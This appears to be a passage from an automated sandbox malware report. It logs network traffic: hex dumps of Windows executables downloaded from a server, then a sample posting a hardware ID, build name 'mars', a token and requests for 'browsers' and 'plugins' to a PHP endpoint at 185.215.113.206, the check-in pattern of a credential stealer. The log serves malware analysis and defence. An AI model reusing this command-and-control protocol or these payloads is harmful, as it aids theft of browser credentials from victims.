00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 20 Nov 2024 09:55:18 GMTContent-Type: application/octet-streamContent-Length: 1806336Last-Modified: Wed, 20 Nov 2024 09:41:39 GMTConnection: keep-aliveETag: "673daed3-1b9000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce ac e2 38 8a cd 8c 6b 8a cd 8c 6b 8a cd 8c 6b e5 bb 27 6b 92 cd 8c 6b e5 bb 12 6b 87 cd 8c 6b e5 bb 26 6b b0 cd 8c 6b 83 b5 0f 6b 89 cd 8c 6b 83 b5 1f 6b 88 cd 8c 6b 0a b4 8d 6a 89 cd 8c 6b 8a cd 8d 6b d1 cd 8c 6b e5 bb 23 6b 98 cd 8c 6b e5 bb 11 6b 8b cd 8c 6b 52 69 63 68 8a cd 8c 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4f c3 2f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 22 01 00 00 00 00 00 00 00 69 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 69 00 00 04 00 00 3a e9 1b 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 62 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 ac 01 00 00 00 a0 24 00 00 02 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 74 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 40 2a 00 00 c0 24 00 00 02 00 00 00 76 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 69 75 79 61 6d 79 6e 00 f0 19 00 00 00 4f 00 00 f0 19 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 65 7a 77 63 64 6d 74 74 00 10 00 00 00 f0 68 00 00 06 00 00 00 68 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 00 69 00 00 22 00 00 00 6e 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 20 Nov 2024 09:55:23 GMTContent-Type: application/octet-streamContent-Length: 922624Last-Modified: Wed, 20 Nov 2024 09:39:46 GMTConnection: keep-aliveETag: "673dae62-e1400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 5a ae 3d 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 64 04 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 70 0e 00 00 04 00 00 a6 80 0e 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 bc a9 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 0d 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 bc a9 00 00 00 40 0d 00 00 aa 00 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 f0 0d 00 00 76 00 00 00 9e 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 20 Nov 2024 09:55:28 GMTContent-Type: application/octet-streamContent-Length: 2741248Last-Modified: Wed, 20 Nov 2024 09:40:13 GMTConnection: keep-aliveETag: "673dae7d-29d400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 40 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 2a 00 00 04 00 00 f4 14 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 79 67 67 79 65 6e 6e 70 00 80 29 00 00 a0 00 00 00 72 29 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 63 65 66 74 72 65 73 69 00 20 00 00 00 20 2a 00 00 06 00 00 00 ac 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 40 2a 00 00 22 00 00 00 b2 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 20 Nov 2024 09:55:36 GMTContent-Type: application/octet-streamContent-Length: 2741248Last-Modified: Wed, 20 Nov 2024 09:40:15 GMTConnection: keep-aliveETag: "673dae7f-29d400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 40 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 2a 00 00 04 00 00 f4 14 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 79 67 67 79 65 6e 6e 70 00 80 29 00 00 a0 00 00 00 72 29 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 63 65 66 74 72 65 73 69 00 20 00 00 00 20 2a 00 00 06 00 00 00 ac 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 40 2a 00 00 22 00 00 00 b2 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 20 Nov 2024 09:56:02 GMTContent-Type: application/octet-streamContent-Length: 2741248Last-Modified: Wed, 20 Nov 2024 09:40:15 GMTConnection: keep-aliveETag: "673dae7f-29d400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 40 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 2a 00 00 04 00 00 f4 14 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 79 67 67 79 65 6e 6e 70 00 80 29 00 00 a0 00 00 00 72 29 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 63 65 66 74 72 65 73 69 00 20 00 00 00 20 2a 00 00 06 00 00 00 ac 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 40 2a 00 00 22 00 00 00 b2 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: POST /OneCollector/1.0/ HTTP/1.1Accept: */*APIKey: cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521AuthMsaDeviceTicket: t=GwAWAbuEBAAU2qcZHJoKGNizGOeyqM4OaIoSZ0MOZgAAENX7wUC+MYl+R+dP6Ge+Ps/gAK2S4rAvLsS9lNlstWnrY2Ovw6/QYWUW40yWi3W2oq2TgmfD/F4rhcGc/Q3kxTRWn1J3nPhOAny4YuIpbKp/JxVo2IKfr0u2Ob+Xasi+8kVvlgcJFM/02j6m9rZf8SsufBGSnZuCNcAMbSRQwAt9ttIddTRQ/7dkFG7ZzhfDKlscCwPqu8roSfIr2wEDw126PJnTg8kgpdZV8FhO09Z9yZkJbvNRCuX40AaiKTP7/kep+t5XHG1Tp05wc6bODUUz8SiWkHpg7isRn5nplH5Pwj6qy8wfjiPn8r9T6Iz9u6hFIAE=&p=Client-Id: NO_AUTHContent-Encoding: deflateContent-Type: application/bond-compact-binaryExpect: 100-continueSDK-Version: EVT-Windows-C++-No-3.4.15.1Upload-Time: 1732096746244Host: self.events.data.microsoft.comContent-Length: 7973Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKJEGCFBGDHJJJJJKJECHost: 185.215.113.206Content-Length: 209Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 42 43 34 45 46 33 32 41 37 44 35 34 37 38 32 34 35 32 35 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 43 2d 2d 0d 0a Data Ascii: ------AKJEGCFBGDHJJJJJKJECContent-Disposition: form-data; name="hwid"2BC4EF32A7D547824525------AKJEGCFBGDHJJJJJKJECContent-Disposition: form-data; name="build"mars------AKJEGCFBGDHJJJJJKJEC--
                      Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKKKEGIDBGHIDGDHDBFHHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 36 35 34 31 61 31 30 38 32 62 32 38 39 31 62 32 65 62 39 65 39 36 66 32 35 33 36 66 30 31 39 33 30 62 62 64 31 66 33 64 64 35 64 62 36 64 32 37 64 31 66 30 66 63 65 64 30 65 34 63 33 31 62 32 38 63 37 64 38 32 34 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 48 2d 2d 0d 0a Data Ascii: ------BKKKEGIDBGHIDGDHDBFHContent-Disposition: form-data; name="token"b6541a1082b2891b2eb9e96f2536f01930bbd1f3dd5db6d27d1f0fced0e4c31b28c7d824------BKKKEGIDBGHIDGDHDBFHContent-Disposition: form-data; name="message"browsers------BKKKEGIDBGHIDGDHDBFH--
                      Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJECGHJDBFIJJJKEHCBFHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 45 43 47 48 4a 44 42 46 49 4a 4a 4a 4b 45 48 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 36 35 34 31 61 31 30 38 32 62 32 38 39 31 62 32 65 62 39 65 39 36 66 32 35 33 36 66 30 31 39 33 30 62 62 64 31 66 33 64 64 35 64 62 36 64 32 37 64 31 66 30 66 63 65 64 30 65 34 63 33 31 62 32 38 63 37 64 38 32 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 43 47 48 4a 44 42 46 49 4a 4a 4a 4b 45 48 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 43 47 48 4a 44 42 46 49 4a 4a 4a 4b 45 48 43 42 46 2d 2d 0d 0a Data Ascii: ------JJECGHJDBFIJJJKEHCBFContent-Disposition: form-data; name="token"b6541a1082b2891b2eb9e96f2536f01930bbd1f3dd5db6d27d1f0fced0e4c31b28c7d824------JJECGHJDBFIJJJKEHCBFContent-Disposition: form-data; name="message"plugins------JJECGHJDBFIJJJKEHCBF--
                      Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAEBGCFIEHCFIDGCAAFBHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 45 42 47 43 46 49 45 48 43 46 49 44 47 43 41 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 36 35 34 31 61 31 30 38 32 62 32 38 39 31 62 32 65 62 39 65 39 36 66 32 35 33 36 66 30 31 39 33 30 62 62 64 31 66 33 64 64 35 64 62 36 64 32 37 64 31 66 30 66 63 65 64 30 65 34 63 33 31 62 32 38 63 37 64 38 32 34 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 42 47 43 46 49 45 48 43 46 49 44 47 43 41 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 42 47 43 46 49 45 48 43 46 49 44 47 43 41 41 46 42 2d 2d 0d 0a Data Ascii: ------BAEBGCFIEHCFIDGCAAFBContent-Disposition: form-data; name="token"b6541a1082b2891b2eb9e96f2536f01930bbd1f3dd5db6d27d1f0fced0e4c31b28c7d824------BAEBGCFIEHCFIDGCAAFBContent-Disposition: form-data; name="message"fplugins------BAEBGCFIEHCFIDGCAAFB--
